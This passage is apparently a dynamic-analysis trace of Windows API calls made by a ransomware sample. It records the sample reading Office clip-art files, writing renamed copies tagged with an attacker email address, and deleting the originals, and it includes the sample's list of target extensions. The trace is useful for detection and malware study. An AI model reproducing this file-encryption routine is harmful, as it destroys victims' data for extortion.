returned 4 [0056.443] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0056.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 63 [0056.443] lstrlenW (lpString=".jpg") returned 4 [0056.443] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0056.444] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=20454) returned 1 [0056.444] CloseHandle (hObject=0x204) returned 1 [0056.444] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif")) returned 0x20 [0056.444] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0056.444] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0056.444] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.444] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.444] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0056.445] GetLastError () returned 0x0 [0056.445] ReadFile (in: hFile=0x204, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x4fe6, lpOverlapped=0x0) returned 1 [0056.446] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x4ff0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x4ff0, lpOverlapped=0x0) returned 1 [0056.447] ReadFile (in: hFile=0x204, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0056.447] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.448] SetEndOfFile (hFile=0x230) returned 1 [0056.448] CloseHandle (hObject=0x230) returned 1 [0056.448] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.448] SetEndOfFile (hFile=0x204) returned 1 [0056.449] CloseHandle (hObject=0x204) returned 1 [0056.449] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0056.449] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif")) returned 1 [0056.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0056.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0056.449] lstrlenW (lpString=".doc") returned 4 [0056.449] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0056.449] lstrlenW (lpString=".docx") returned 5 [0056.449] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0056.449] lstrlenW (lpString=".pdf") returned 4 [0056.449] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0056.449] lstrlenW (lpString=".xls") returned 4 [0056.449] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0056.450] lstrlenW (lpString=".xlsx") returned 5 [0056.450] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0056.450] lstrlenW (lpString=".ppt") returned 4 [0056.450] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0056.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0056.450] lstrlenW (lpString=".zip") returned 4 [0056.450] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0056.450] lstrlenW (lpString=".rar") returned 4 [0056.450] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0056.450] lstrlenW (lpString=".bz2") returned 4 [0056.450] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0056.450] lstrlenW (lpString=".7z") returned 3 [0056.450] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0056.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0056.450] lstrlenW (lpString=".dbf") returned 4 [0056.450] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0056.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0056.450] lstrlenW (lpString=".1cd") returned 4 [0056.450] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0056.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 63 [0056.450] lstrlenW (lpString=".jpg") returned 4 [0056.450] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0056.450] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=15733) returned 1 [0056.450] CloseHandle (hObject=0x204) returned 1 [0056.451] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif")) returned 0x20 [0056.451] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0056.451] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0056.451] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.451] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.451] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0056.451] GetLastError () returned 0x0 [0056.451] ReadFile (in: hFile=0x204, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x3d75, lpOverlapped=0x0) returned 1 [0056.453] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x3d80, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x3d80, lpOverlapped=0x0) returned 1 [0056.454] ReadFile (in: hFile=0x204, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0056.454] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.454] SetEndOfFile (hFile=0x230) returned 1 [0056.455] CloseHandle (hObject=0x230) returned 1 [0056.455] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.455] SetEndOfFile (hFile=0x204) returned 1 [0056.456] CloseHandle (hObject=0x204) returned 1 [0056.456] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0056.456] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif")) returned 1 [0056.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0056.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0056.456] lstrlenW (lpString=".doc") returned 4 [0056.456] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0056.456] lstrlenW (lpString=".docx") returned 5 [0056.456] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0056.456] lstrlenW (lpString=".pdf") returned 4 [0056.456] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0056.456] lstrlenW (lpString=".xls") returned 4 [0056.456] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0056.456] lstrlenW (lpString=".xlsx") returned 5 [0056.456] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0056.456] lstrlenW (lpString=".ppt") returned 4 [0056.456] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0056.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0056.457] lstrlenW (lpString=".zip") returned 4 [0056.457] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0056.457] lstrlenW (lpString=".rar") returned 4 [0056.457] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0056.457] lstrlenW (lpString=".bz2") returned 4 [0056.457] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0056.457] lstrlenW (lpString=".7z") returned 3 [0056.457] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0056.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0056.457] lstrlenW (lpString=".dbf") returned 4 [0056.457] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0056.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0056.457] lstrlenW (lpString=".1cd") returned 4 [0056.457] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0056.457] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0056.457] lstrlenW (lpString=".jpg") returned 4 [0056.457] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0056.457] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=12982) returned 1 [0056.457] CloseHandle (hObject=0x204) returned 1 [0056.457] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf")) returned 0x20 [0056.458] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0056.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0056.458] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.458] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0056.458] GetLastError () returned 0x0 [0056.458] ReadFile (in: hFile=0x204, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x32b6, lpOverlapped=0x0) returned 1 [0056.595] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x32c0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x32c0, lpOverlapped=0x0) returned 1 [0056.597] ReadFile (in: hFile=0x204, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0056.600] WriteFile (in: hFile=0x230, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.600] SetEndOfFile (hFile=0x230) returned 1 [0056.954] CloseHandle (hObject=0x230) returned 1 [0056.954] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0056.954] SetEndOfFile (hFile=0x204) returned 1 [0056.956] CloseHandle (hObject=0x204) returned 1 [0056.956] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0056.956] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf")) returned 1 [0057.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0057.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0057.326] lstrlenW (lpString=".doc") returned 4 [0057.326] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.326] lstrlenW (lpString=".docx") returned 5 [0057.326] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.326] lstrlenW (lpString=".pdf") returned 4 [0057.326] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.326] lstrlenW (lpString=".xls") returned 4 [0057.326] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.326] lstrlenW (lpString=".xlsx") returned 5 [0057.327] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.327] lstrlenW (lpString=".ppt") returned 4 [0057.327] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0057.327] lstrlenW (lpString=".zip") returned 4 [0057.327] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.327] lstrlenW (lpString=".rar") returned 4 [0057.327] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.327] lstrlenW (lpString=".bz2") returned 4 [0057.327] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.327] lstrlenW (lpString=".7z") returned 3 [0057.327] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0057.327] lstrlenW (lpString=".dbf") returned 4 [0057.327] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0057.327] lstrlenW (lpString=".1cd") returned 4 [0057.327] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0057.327] lstrlenW (lpString=".jpg") returned 4 [0057.327] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.635] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=7862) returned 1 [0057.635] CloseHandle (hObject=0x22c) returned 1 [0057.635] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00045_.wmf")) returned 0x20 [0057.635] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00045_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.635] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00045_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0057.635] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.635] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.635] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00045_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0057.636] GetLastError () returned 0x0 [0057.636] ReadFile (in: hFile=0x22c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x1eb6, lpOverlapped=0x0) returned 1 [0057.638] WriteFile (in: hFile=0x1c8, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x1ec0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x1ec0, lpOverlapped=0x0) returned 1 [0057.639] ReadFile (in: hFile=0x22c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0057.639] WriteFile (in: hFile=0x1c8, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0057.639] SetEndOfFile (hFile=0x1c8) returned 1 [0057.639] CloseHandle (hObject=0x1c8) returned 1 [0057.639] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.639] SetEndOfFile (hFile=0x22c) returned 1 [0057.640] CloseHandle (hObject=0x22c) returned 1 [0057.640] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.640] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00045_.wmf")) returned 1 [0057.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63 [0057.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63 [0057.640] lstrlenW (lpString=".doc") returned 4 [0057.640] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0057.640] lstrlenW (lpString=".docx") returned 5 [0057.641] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0057.641] lstrlenW (lpString=".pdf") returned 4 [0057.641] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0057.641] lstrlenW (lpString=".xls") returned 4 [0057.641] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0057.641] lstrlenW (lpString=".xlsx") returned 5 [0057.641] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0057.641] lstrlenW (lpString=".ppt") returned 4 [0057.641] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63 [0057.641] lstrlenW (lpString=".zip") returned 4 [0057.641] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.641] lstrlenW (lpString=".rar") returned 4 [0057.641] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.641] lstrlenW (lpString=".bz2") returned 4 [0057.641] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.641] lstrlenW (lpString=".7z") returned 3 [0057.641] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63 [0057.642] lstrlenW (lpString=".dbf") returned 4 [0057.642] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63 [0057.642] lstrlenW (lpString=".1cd") returned 4 [0057.642] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 63 [0057.642] lstrlenW (lpString=".jpg") returned 4 [0057.642] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.642] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1012) returned 1 [0057.642] CloseHandle (hObject=0x22c) returned 1 [0057.642] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00098_.wmf")) returned 0x20 [0057.642] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00098_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.643] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00098_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0057.643] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.643] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.643] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00098_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00098_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0057.643] GetLastError () returned 0x0 [0057.643] ReadFile (in: hFile=0x22c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x3f4, lpOverlapped=0x0) returned 1 [0057.644] WriteFile (in: hFile=0x1c8, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x400, lpOverlapped=0x0) returned 1 [0057.645] ReadFile (in: hFile=0x22c, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 